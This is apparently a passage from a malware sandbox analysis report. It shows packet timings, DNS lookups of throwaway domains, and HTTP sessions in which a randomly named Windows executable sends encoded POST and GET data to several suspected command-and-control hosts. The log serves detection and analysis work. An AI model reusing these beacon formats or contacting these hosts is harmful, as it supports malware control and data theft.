                                                                                      Nov 24, 2024 08:13:03.996937037 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:03.996944904 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:03.997524977 CET5004980192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:04.121469021 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:04.125524044 CET5004980192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:04.192100048 CET5004980192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:05.200629950 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:05.320235968 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:05.320415020 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:05.331769943 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:05.451273918 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.695780993 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.695863008 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.695931911 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696033001 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696046114 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696046114 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:06.696119070 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:06.696158886 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696229935 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696240902 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696250916 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696274996 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:06.696320057 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:06.696343899 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696551085 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:06.697087049 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.697160006 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:07.093847990 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:07.213340998 CET8050050194.58.112.174192.168.2.4
Timestamp    Source Port    Dest Port    Source IP    Dest IP
Timestamp    Source IP    Dest IP    Trans ID    OP Code    Name    Type    Class    DNS over HTTPS
Timestamp    Source IP    Dest IP    Trans ID    Reply Code    Name    CName    Address    Type    Class    DNS over HTTPS
                                                                                      Nov 24, 2024 08:11:26.282588959 CET1.1.1.1192.168.2.40xf5d8No error (0)www.prhmcjdz.tokyoymx01.cnCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:26.282588959 CET1.1.1.1192.168.2.40xf5d8No error (0)ymx01.cn8.210.46.21A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:41.430565119 CET1.1.1.1192.168.2.40x1650No error (0)www.connecty.live203.161.43.228A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:56.402055025 CET1.1.1.1192.168.2.40x58eeNo error (0)www.tals.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:56.402055025 CET1.1.1.1192.168.2.40x58eeNo error (0)www.tals.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:11.344993114 CET1.1.1.1192.168.2.40x9316No error (0)www.50food.com147.255.21.187A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:26.197191000 CET1.1.1.1192.168.2.40x1f7fNo error (0)www.zriaraem-skiry.sbs104.21.42.77A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:26.197191000 CET1.1.1.1192.168.2.40x1f7fNo error (0)www.zriaraem-skiry.sbs172.67.159.61A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:41.722187042 CET1.1.1.1192.168.2.40x6634No error (0)www.nmgzjwh.net172.67.168.228A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:41.722187042 CET1.1.1.1192.168.2.40x6634No error (0)www.nmgzjwh.net172.64.171.187A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:57.122581959 CET1.1.1.1192.168.2.40x7c56No error (0)www.sklad-iq.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:13:12.430054903 CET1.1.1.1192.168.2.40x7507No error (0)www.supernutra01.online172.67.220.36A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:13:12.430054903 CET1.1.1.1192.168.2.40x7507No error (0)www.supernutra01.online104.21.24.198A (IP address)IN (0x0001)false
                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      0 | 192.168.2.4 | 49736 | 76.223.74.74 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:09:49.603538990 CET | 466 | OUT | GET /wu6o/?3vNdCBvX=PAJ2EBywaoPRtAOAuLkHmGqEo3O5GOPxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtCvBZNCCQMFI+vTFboLP2ZRmMaANZD1baSXk=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.grandesofertas.fun
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:09:50.755297899 CET | 600 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:09:50 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 162
                                                                                      Connection: close
                                                                                      Location: https://www.grandesofertas.fun/wu6o/?3vNdCBvX=PAJ2EBywaoPRtAOAuLkHmGqEo3O5GOPxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtCvBZNCCQMFI+vTFboLP2ZRmMaANZD1baSXk=&etx=BXy4elO0X
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      1 | 192.168.2.4 | 49759 | 154.90.58.209 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:10:07.050307989 CET | 722 | OUT | POST /z9pi/ HTTP/1.1
                                                                                      Host: www.jijievo.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.jijievo.site
                                                                                      Referer: http://www.jijievo.site/z9pi/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=vc1efZByy0/GrhkBgaG4VigFTGb4MDfblLQ1XLbA1Bd0ugtrI7E4SxkiDPysll/LCuTrsmCQfRxj5OTtF+f0iAUko/HzcRJj3IObMSzYlE4FW+gHgw3chPCmHRSm2wh4KH0rdnIivl+4U+3p1sqmf5wmNcvW6Ndad0Bw7eyhLHXx2vTwA7Gj2a7WVoHDopFB8g==


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      2 | 192.168.2.4 | 49765 | 154.90.58.209 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:10:09.706563950 CET | 742 | OUT | POST /z9pi/ HTTP/1.1
                                                                                      Host: www.jijievo.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.jijievo.site
                                                                                      Referer: http://www.jijievo.site/z9pi/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=vc1efZByy0/GqBUB75u4ZSgCPWb4eDezlLc1XKfQ1y50uFJrJ/w4TxkiX/zo41/MCueesnuQfSNj5MLtFJr3jQUmkfH9ChJj3IObMSn+lEwFWN4HgSfTiPClOxSmngh8KH0FdmUcvmG4U+Hp29qnEpwgC8uA2OlUE0p+7tqwG1iT3peqRKn0kaflIvO3lq4InhQxTt8vqPbwszXTOKS5ENY=


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      3 | 192.168.2.4 | 49771 | 154.90.58.209 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:10:12.367130995 CET | 10824 | OUT | POST /z9pi/ HTTP/1.1
                                                                                      Host: www.jijievo.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.jijievo.site
                                                                                      Referer: http://www.jijievo.site/z9pi/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      4 | 192.168.2.4 | 49777 | 154.90.58.209 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:10:15.048355103 CET | 460 | OUT | GET /z9pi/?3vNdCBvX=ied+cptg7UakpzhOx9uXTlAGHDuhbT7ej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipvFkLuNeVdA8j2seJJxWGnVEyQ8hCuTv0uPE=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.jijievo.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:10:16.659656048 CET | 197 | IN | HTTP/1.1 200 OK
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Date: Sun, 24 Nov 2024 07:10:16 GMT
                                                                                      Server: nginx
                                                                                      Vary: Accept-Encoding
                                                                                      Content-Length: 24
                                                                                      Connection: close
                                                                                      Data Ascii: Unable to get connection


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      5 | 192.168.2.4 | 49798 | 47.76.213.197 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:10:23.275626898 CET | 716 | OUT | POST /8qt7/ HTTP/1.1
                                                                                      Host: www.ytsd88.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.ytsd88.top
                                                                                      Referer: http://www.ytsd88.top/8qt7/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=IrqOQ6xe73IIjJ5GOwygtrfSYGQn/rFaL7kqkhBqcZ6C9b1DeYEmKDfRuyc2WwEgv7Fke9kZJoubLGZizm0QjLdhXXU3NIbEQSGQkFZfaU4fmEfdMXIkJSPBZAkBVJ+JDnO2+NIgdy7GLNZFTtOj+s9rQHWQnB6ffuftGn7/VZjb9u3RKiuPTIli0k40/ODZaw==
                                                                                      Nov 24, 2024 08:10:24.857832909 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:10:24 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 409
                                                                                      Connection: close
                                                                                      ETag: "66d016cf-199"
                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      6 | 192.168.2.4 | 49804 | 47.76.213.197 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:10:25.944946051 CET | 736 | OUT | POST /8qt7/ HTTP/1.1
                                                                                      Host: www.ytsd88.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.ytsd88.top
                                                                                      Referer: http://www.ytsd88.top/8qt7/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=IrqOQ6xe73IIit9GMTqgkrfNWmQn1LFgL7oqkgF6dreC96FDfdkmLDfRmSc3VAErv7JGe8YZJo6bLGpizxgXs7djf3UxVobEQSGQkFcXaUAfl0PdNy8lISPCRgkBRJ+NDnOE+MUOdxDGLI9FT8Osr88iPXX4rD7af+K5Im/ELYjI4o6LbTPYBIBRpjxAyN+QB63nFUpFbLjMnkkpccAr/7s=
                                                                                      Nov 24, 2024 08:10:27.528074026 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:10:27 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 409
                                                                                      Connection: close
                                                                                      ETag: "66d016cf-199"
                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                      7    192.168.2.4    49810    47.76.213.197    80    4544    C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                      Nov 24, 2024 08:10:28.650484085 CET    10818    OUT    POST /8qt7/ HTTP/1.1
                                                                                      Host: www.ytsd88.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.ytsd88.top
                                                                                      Referer: http://www.ytsd88.top/8qt7/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX= [TRUNCATED]
                                                                                      Nov 24, 2024 08:10:30.245706081 CET    574    IN    HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:10:29 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 409
                                                                                      Connection: close
                                                                                      ETag: "66d016cf-199"
                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                      8    192.168.2.4    49817    47.76.213.197    80    4544    C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                      Nov 24, 2024 08:10:31.342281103 CET    458    OUT    GET /8qt7/?3vNdCBvX=FpCuTMU+yGtduI5SdGSwoaTqY2YvqsELSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXjJlaW2N0MrSdIjCq1nBCaRQTsV/7KTtyEyY=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.ytsd88.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:10:32.893115997 CET    574    IN    HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:10:32 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 409
                                                                                      Connection: close
                                                                                      ETag: "66d016cf-199"
                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                      9    192.168.2.4    49835    74.48.143.82    80    4544    C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                      Nov 24, 2024 08:10:38.993603945 CET    722    OUT    POST /mlxg/ HTTP/1.1
                                                                                      Host: www.bpgroup.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.bpgroup.site
                                                                                      Referer: http://www.bpgroup.site/mlxg/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=RSb5LTpCCFtBU4Zhf3fBv1iYvHzVO47ozH8GvcblxrCI94AaeAtPoMEgTzEGZA7ulx7BBW8DU05wxXpLHbvKOs98ZDbLGizsvRSktmNs586DwXGIfFaL1TySOWlPpCXxa0t52oW/Bbv8ADvpxM/8tLPzVnO7hpfXoAleQBa6b45xmPdhqXtkttv8j1wfQiuV2Q==
                                                                                      Nov 24, 2024 08:10:40.198443890 CET    1236    IN    HTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 1251
                                                                                      date: Sun, 24 Nov 2024 07:10:40 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                      Nov 24, 2024 08:10:40.198467016 CET    253    IN
                                                                                      Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                      10    192.168.2.4    49842    74.48.143.82    80    4544    C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                      Nov 24, 2024 08:10:41.666551113 CET    742    OUT    POST /mlxg/ HTTP/1.1
                                                                                      Host: www.bpgroup.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.bpgroup.site
                                                                                      Referer: http://www.bpgroup.site/mlxg/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=RSb5LTpCCFtBUYphcU3B/liZjnzVEY7szHAGvYD1xZWI9ZwaPxtPksEgYTFOdA7llx2+BUoDU0twxWZLGsDJcs9+RjbFICzsvRSktmZG58iDwH2IZkaI0TyTPWlPtCX1a0th2pbUBdz8ACfpx4j/+rP1LXPPodSlgAoofRWWe5EQupQ77mMz/tLP+y5rdhTcteeH8ZztJMVWgHJJFSY6XsY=
                                                                                      Nov 24, 2024 08:10:42.916935921 CET    1236    IN    HTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 1251
                                                                                      date: Sun, 24 Nov 2024 07:10:43 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                      Nov 24, 2024 08:10:42.917006016 CET    253    IN
                                                                                      Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                      11    192.168.2.4    49848    74.48.143.82    80    4544    C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                      Nov 24, 2024 08:10:44.335087061 CET    10824    OUT    POST /mlxg/ HTTP/1.1
                                                                                      Host: www.bpgroup.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.bpgroup.site
                                                                                      Referer: http://www.bpgroup.site/mlxg/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX= [TRUNCATED]
                                                                                      Nov 24, 2024 08:10:45.583853006 CET    1236    IN    HTTP/1.1 404 Not Found
                                                                                      Connection: close
                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                      pragma: no-cache
                                                                                      content-type: text/html
                                                                                      content-length: 1251
                                                                                      date: Sun, 24 Nov 2024 07:10:45 GMT
                                                                                      server: LiteSpeed
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                      Nov 24, 2024 08:10:45.583875895 CET    253    IN
                                                                                      Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
